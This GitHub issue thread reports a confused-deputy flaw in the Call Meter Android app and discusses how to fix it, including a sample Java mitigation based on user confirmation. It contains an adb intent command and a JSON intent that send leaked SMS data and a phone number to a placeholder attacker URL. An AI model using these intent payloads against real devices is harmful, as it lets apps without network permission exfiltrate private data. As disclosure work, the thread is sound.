felixb / callmeter

Call Meter 3G is the most complete monitor app for your Android device: It monitors your calls, text messages and data usage.
GNU General Public License v3.0

Inter-Application Vulnerability #79

Closed biniamf closed 8 years ago

biniamf commented 8 years ago

Hi there,

This issue report is part of a research project. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:

adb shell 'am start "intent://ATTACKER_WEBSITE_WITH_GET_REQUEST#Intent;scheme=http;action=android.intent.action.VIEW;category=android.intent.category.ALTERNATIVE;component=de.ub0r.android.callmeter/.ui.prefs.Preferences;end"'

By automating this command, an attacking app without INTERNET permission can post sensitive information to the attacker's website.

The problem is in the getStream(final ContentResolver cr, final Uri uri) method in class Preferences, where the scheme is checked to be 'http' or 'https', but the data is not checked to be XML, and a connection is opened on the URI.

Can you please confirm this?

Thank you, Biniam

felixb commented 8 years ago

Thanks for the bug report. Can you please add some more context on how an attacker would use this? The thing is, even if I check for an XML in the response, the attacker still could send any data, right? Any idea how to fix this?

biniamf commented 8 years ago

Ok, here is a simple context. Let's say the malicious app has permission to access sensitive data (e.g., it can read SMS) but not INTERNET permission. Then the malicious app can send this sensitive data to the attackers by sending an explicit intent request to your app with the following details:

{ "action": "android.intent.action.VIEW", "category": "android.intent.category.ALTERNATIVE", "className": ".ui.prefs.Preferences", "componentName": "de.ub0r.android.callmeter", "host": "xyz.com/p.php?phoneno=123&sms=leaked_sms_message&other_sensitive_data=here", "protocol": "http" }

which will make your app be used to leak information. In order to simply try this, you can set up a simple web server (or online with free hosting) and use the above ADB command, modifying the ATTACKER_WEBSITE_WITH_GET_REQUEST with an appropriate URL (e.g., xyz.com/p.php?phoneno=123...).

About fixing:

You are right, checking for an XML will not change anything. Off the top of my head, a simple solution could be sanitizing the URL before calling HttpURLConnection con = (HttpURLConnection) new URL(url).openConnection();

For example, checking if (url.Query() != null) and then stopping if it is not null.

Wouldn't it work?

-Biniam

felixb commented 8 years ago

Checking for query params won't change anything. The attacker might choose regular paths or something similar.

Basically, I need to support arbitrary URLs anyway. I don't want to put restrictions on where users can host their rule sets.

Btw: isn't it easier for an attacker to just use the built-in browser to push out data the way you described?
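The mitigation the discussion points toward is not a filter on URL shape (query string, path, or response type), which the two posters agree cannot work, but a gate on who decides: keep accepting arbitrary URLs, yet never open a connection for a URL that arrived from another app until the user has explicitly approved it. The following is an added example written for this thread; it is not Call Meter's own code, and the activity name, the `onRuleSetDownloaded` hook, the dialog wording and the use of `Toast` for feedback are assumptions.

```java
package example.hypothetical;  // hypothetical package, not Call Meter's own

import android.app.Activity;
import android.app.AlertDialog;
import android.net.Uri;
import android.os.Bundle;
import android.widget.Toast;

import java.io.IOException;
import java.io.InputStreamReader;
import java.io.Reader;
import java.net.HttpURLConnection;
import java.net.URL;

/** Exported activity handling VIEW intents for http/https URLs (hypothetical name). */
public class RuleSetImportActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri uri = getIntent().getData();
        if (uri == null || !isHttpOrHttps(uri)) {
            finish();
            return;
        }
        // Do not open a connection here. The intent may come from any app on the
        // device, so the URL is attacker-controlled; fetching it unprompted lets an
        // app without INTERNET permission use this one as its network proxy.
        confirmThenFetch(uri);
    }

    private static boolean isHttpOrHttps(Uri uri) {
        String scheme = uri.getScheme();
        return "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
    }

    private void confirmThenFetch(final Uri uri) {
        // Show the complete URL, path and query included, so the user sees exactly
        // what would be sent. Filtering on URL shape instead does not help, as the
        // thread notes: a path segment carries data just as well as a query string.
        new AlertDialog.Builder(this)
                .setTitle("Import rule set from the web?")
                .setMessage("Another app asked this app to download:\n\n" + uri
                        + "\n\nContinuing sends this address to that server.")
                .setPositiveButton("Download", (d, w) -> fetchInBackground(uri.toString()))
                .setNegativeButton("Cancel", (d, w) -> finish())
                .setCancelable(false)  // no dismissal path that skips the decision
                .show();
    }

    private void fetchInBackground(final String url) {
        // Runs only after an explicit tap, which another app cannot automate and
        // which is impossible while the screen is off or the device is locked.
        new Thread(() -> {
            String body;
            try {
                body = download(url);
            } catch (IOException e) {
                final String msg = "Download failed: " + e.getMessage();
                runOnUiThread(() -> {
                    Toast.makeText(this, msg, Toast.LENGTH_LONG).show();
                    finish();
                });
                return;
            }
            final String xml = body;
            runOnUiThread(() -> {
                onRuleSetDownloaded(xml);
                finish();
            });
        }).start();
    }

    /** Plain HTTP GET with timeouts and a bounded response size. */
    static String download(String url) throws IOException {
        HttpURLConnection con = (HttpURLConnection) new URL(url).openConnection();
        con.setConnectTimeout(10_000);
        con.setReadTimeout(10_000);
        try {
            if (con.getResponseCode() != HttpURLConnection.HTTP_OK) {
                throw new IOException("HTTP " + con.getResponseCode());
            }
            Reader in = new InputStreamReader(con.getInputStream(), "UTF-8");
            StringBuilder sb = new StringBuilder();
            char[] buf = new char[4096];
            int n;
            while ((n = in.read(buf)) != -1 && sb.length() < 1_000_000) {
                sb.append(buf, 0, n);
            }
            return sb.toString();
        } finally {
            con.disconnect();
        }
    }

    /** Hypothetical hook: hand the downloaded XML to the app's existing rule-set parser. */
    void onRuleSetDownloaded(String xml) {
        Toast.makeText(this, "Rule set received, " + xml.length() + " chars", Toast.LENGTH_SHORT).show();
    }
}
```

The design choice is that the only thing separating a legitimate import from a confused-deputy request is consent: a user who tapped a rule-set link expects a download, while a background app firing the same intent cannot supply the tap. Showing the full URL in the dialog also gives the user a chance to notice an address that plainly carries data rather than pointing at a rule-set file.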

biniamf commented 8 years ago

Yes, the default browser is a known case: http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-android-permissions-what-you-need-to-know/ but it's a bit different because it cannot be used if the device is locked or the screen is off. Apart from that, it can be used in the same way without having internet permission.